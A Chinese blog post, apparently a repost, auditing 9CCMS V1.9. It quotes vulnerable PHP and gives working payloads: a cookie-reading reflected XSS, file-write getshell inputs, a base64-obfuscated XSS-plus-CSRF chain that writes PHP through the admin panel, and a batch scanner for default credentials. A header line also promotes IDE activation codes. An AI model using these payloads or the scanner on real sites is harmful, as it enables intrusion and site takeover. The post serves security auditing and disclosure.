1. 全栈程序员必看首页

代码审计系列:久草CMS(9CCMS)V1.9

全栈程序员-站长 未分类 阅读 6

代码审计系列:久草CMS(9CCMS)V1.9偶然看到一篇9CCMS(久草CMS)V1.9弱口令+后台拿shell的文章,兴起去找来源码进行审计

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

前言

偶然看到一篇9CCMS(久草CMS) V1.9 弱口令+后台拿shell的文章
兴起去找来源码看看,下载源码

审计了下有下面这些洞

1、前台反射XSS

在文件static/home/videojs/index.php中有

<script type="text/javascript">

var vPath = '<?php include('../../../Php/Public/Helper.php'); echo safeRequest($_GET['Play']);?>';

var logo = '';
var myVideo=initVideo({ 
   
      id:'myVideo',
      url:vPath,
      ad:{ 
   
          pre:{ 
   
               url:'',
               link:'',
               },
      },
      logo:{ 
   
         url:'logo.png',
         width:'100px'
         },
      });
</script>

跟踪saferequest

<?php
function safeRequest($data){ 
   
    $data = stripslashes($data); // 刪除反斜杠
    $data = htmlspecialchars($data); //把预定义的字符 "<" (小于)和 ">" (大于)转换为 HTML 实体:
    return $data;
}
?>

发现只处理了反斜杠和尖括号
但是它已经在script标签中
所以只要阶段标签就会触发XSS

?Play=%27;alert(document.cookie);%27

在这里插入图片描述

2、后台广告添加文件写入

php/admin/home/ad/adjs.php文件中有:

<?php

$postAdJs = $_POST['AdJs'];
if (isset($_POST['submit']) && isset($postAdJs)) { 
   
$file = fopen("../JCSQL/Admin/Ad/AdminAdJs.php","w");
fwrite($file,$postAdJs);
fclose($file);  
?>

未对传递进来的数据进行过滤
并且直接写到了/JCSQL/Admin/Ad/AdminAdJs.php文件中
可直接getshell

在这里插入图片描述
在这里插入图片描述
不过无法执行命令
要用蚁剑插件绕过

在这里插入图片描述

3、密码修改文件写入

php/admin/home/security/userpass.php文件中有:

<?php

if (isset($_POST['submit']) && isset($_POST['username']) && isset($_POST['password'])  && isset($_POST['ippass']) ) { 
   
function post_input($data){ 
   $data = stripslashes($data);$data = htmlspecialchars($data);return $data;}
$username = post_input($_POST["username"]);
$password = post_input($_POST["password"]);  
$ippass = post_input($_POST["ippass"]);
  $str = '';
  $str .= '<?php';
  $str .= "n";
  $str .= '//后台密码';
  $str .= "n";
  $str .= 'define('USERNAME', ''.$username.'');';
  $str .= "n";
  $str .= 'define('PASSWORD', ''.$password.'');';
  $str .= "n";
  $str .= 'define('IPPASS', ''.$ippass.'');';
  $str .= "n";  
  $str .= '?>';
  $ff = fopen("../JCSQL/Admin/Security/AdminUser.php",'w+');
  fwrite($ff,$str);
?>

除了做了html实体编码和删除反斜杠以外,未作任何安全处理
直接写入/JCSQL/Admin/Security/AdminUser.php文件中
这里也可以直接拿shell

在这里插入图片描述
在这里插入图片描述

4、前台XSS+CSRF+文件写入

后台所有请求都未添加CSRF token
那不就一个组合拳了

payload如下:

/static/home/videojs/index.php?Play=';eval(atob('dmFyIGh0dHBSZXF1ZXN0ID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7Cmh0dHBSZXF1ZXN0Lm9wZW4oJ1BPU1QnLCAnaHR0cDovLzE5Mi4xNjguMTguMTMxL2FkbWlueC8%2fUGhwPUhvbWUvQWQvQWRKcycsIHRydWUpOyAKaHR0cFJlcXVlc3Quc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC10eXBlIiwiYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkIik7Cmh0dHBSZXF1ZXN0LnNlbmQoJ0FkSnM9MTIzJTNDJTNGcGhwK3BocGluZm8lMjglMjklM0IlM0YlM0Umc3VibWl0PScpOwpodHRwUmVxdWVzdC5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbiAoKSB7CiAgICBpZiAoaHR0cFJlcXVlc3QucmVhZHlTdGF0ZSA9PSA0ICYmIGh0dHBSZXF1ZXN0LnN0YXR1cyA9PSAyMDApIHsKICAgICAgICB2YXIganNvbiA9IGh0dHBSZXF1ZXN0LnJlc3BvbnNlVGV4dDsKICAgICAgICBjb25zb2xlLmxvZyhqc29uKTsKICAgIH0KfTs%3D'));'

管理员点击该链接可写入webshell

5、弱口令

开头那篇文章的师傅的一个检测脚本

#!/usr/bin/env python
# -*- coding:utf-8 -*-

import time
import requests
import os
from requests.sessions import session
os.system('')
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# 禁用安全请求警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import argparse
class poc():
    def title(self):
        print(''' +-----------------------------------------------------------------+ 漏洞名称:9CCCMS 弱口令 功能:单个检测,批量检测 单个检测:python poc.py -u url 批量检测:python poc.py -f 1.txt +-----------------------------------------------------------------+ ''')
    def poc(self, target_ur):
        url = f'{target_ur}/adminx/'
        headers = { 
   'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}
        try:
            res = requests.get(url=url, headers=headers,verify=False,timeout=10)
            return res
        except Exception as e:
            print("\033[31m[x] 请求失败 \033[0m", e)
    def main(self, target_url, file):
        self.title()
        count=0
        if target_url:
            res=self.poc(target_url)
            if res.status_code==200 and "当前使用的是默认账号" in res.text:
                print(f'\033[31m[+] {target_url} 存在弱口令:9ccms/9ccms \033[0m')
        if file:
            for url in file:
                count += 1
                target_url = url.replace('\n', '')  #取消换行符
                #time.sleep(1)
                res=self.poc(target_url)
                try:
                    if res.status_code==200 and "当前使用的是默认账号" in res.text:
                        print(f'\033[31m[{count}] 响应值为200,{target_url} 存在弱口令:9ccms/9ccms\033[0m')
                    else:
                        print(f'[{count}] 响应值为{res.status_code},{target_url} 不存在弱口令')
                except Exception as e:
                    print("\033[31m[x] 请求失败 \033[0m", e)
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-u','--url',type=str,default=False,help="目标地址,带上http://")
    parser.add_argument("-f",'--file', type=argparse.FileType('r'),default=False,help="批量检测,带上http://")
    args = parser.parse_args()
    run = poc()
    run.main(args.url, args.file)

结语

后台都是洞啊

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/180200.html原文链接:https://javaforall.net

(0)
0 0

关于作者

全栈程序员-站长的头像

全栈程序员-站长

133.5K 文章
3 粉丝
本网站汇聚当前互联网主流语音,持续更新,欢迎关注公众号“全栈程序员社区”
上一篇 2022年10月19日 下午5:46
下一篇 2022年10月19日 下午5:46


相关推荐

  • 常用内存数据库三

    常用内存数据库三

    常用内存数据库三4 1 2 nbsp nbsp nbsp 哪些场合适合使用其他的关系型数据库管理系统 RDBMS nbsp nbsp nbsp nbsp nbsp nbsp nbsp nbsp nbsp 客户端 服务器程序如果你有许多的客户端程序要通过网络访问一个共享的数据库 nbsp 你应当考虑用一个客户端 服务器数据库来替代 SQLite SQLite 可以通过网络文件系统工作 nbsp 但是因为和大多数网络文件系统都存在延时 nbsp 因此执行效率不会很高 nbsp 此外大多数网络文件系统在实现文件逻辑锁的方面都存在着 bug

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月18日
    1
  • cglib动态代理实现原理_动态代理的两种方式

    cglib动态代理实现原理_动态代理的两种方式

    cglib动态代理实现原理_动态代理的两种方式CGLib动态代理原理CGLib动态代理是代理类去继承目标类,然后重写其中目标类的方法啊,这样也可以保证代理类拥有目标类的同名方法;看一下CGLib的基本结构,下图所示,代理类去继承目标类,每次调用代理类的方法都会被方法拦截器拦截,在拦截器中才是调用目标类的该方法的逻辑,结构还是一目了然的;1.CGLib的基本使用使用一下CGLib,在JDK动态代理中提供一个Proxy类来创建代理类,而在CGLib动态代理中也提供了一个类似的类Enhancer;使用的CGLib版本是2.2.2,我是随便找的,不

    全栈程序员-站长的头像 全栈程序员-站长
    2022年8月30日
    3
  • std::vector初始化[通俗易懂]

    std::vector初始化[通俗易懂]

    std::vector初始化[通俗易懂]#include<iostream>#include<stdint.h>#include<vector>usingnamespacestd;intmain(){ std::vector<uint8_t>temp0(0,0); cout<<“vectorsize:”<<temp0.size()<<endl; std::vector<uint8_t>temp1(.

    全栈程序员-站长的头像 全栈程序员-站长
    2025年12月4日
    5
  • 解决H5页面在微信浏览器中打开 input file 在安卓上没有拍照选项

    解决H5页面在微信浏览器中打开 input file 在安卓上没有拍照选项

    解决H5页面在微信浏览器中打开 input file 在安卓上没有拍照选项有时候我们会在微信公众号里开发会遇到上传图片的功能,当你写&lt;inputtype="file"&gt;的时候,在IOS上可以成功调起拍照和图库两块,在安卓手机上只能调取图库而没有拍照功能,解决办法:给input加上accept属性&lt;inputtype="file"accept="image/*"/&gt; //调用相机,图片或者相册(两者都行)加上了capture=…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月17日
    28
  • js基本语法

    js基本语法

    js基本语法基本语法对象解构 script 定义对象 letuser name lucy age 20 传统从对象里面获取值 letname1 user nameletage1 user ageconsole log name1 age1 es6 获取对象值 let name age userconsole log name age lt script

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月26日
    2
  • 简述Redis的持久化-AOF「建议收藏」

    简述Redis的持久化-AOF「建议收藏」

    简述Redis的持久化-AOF

    全栈程序员-站长的头像 全栈程序员-站长
    2022年2月12日
    53

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号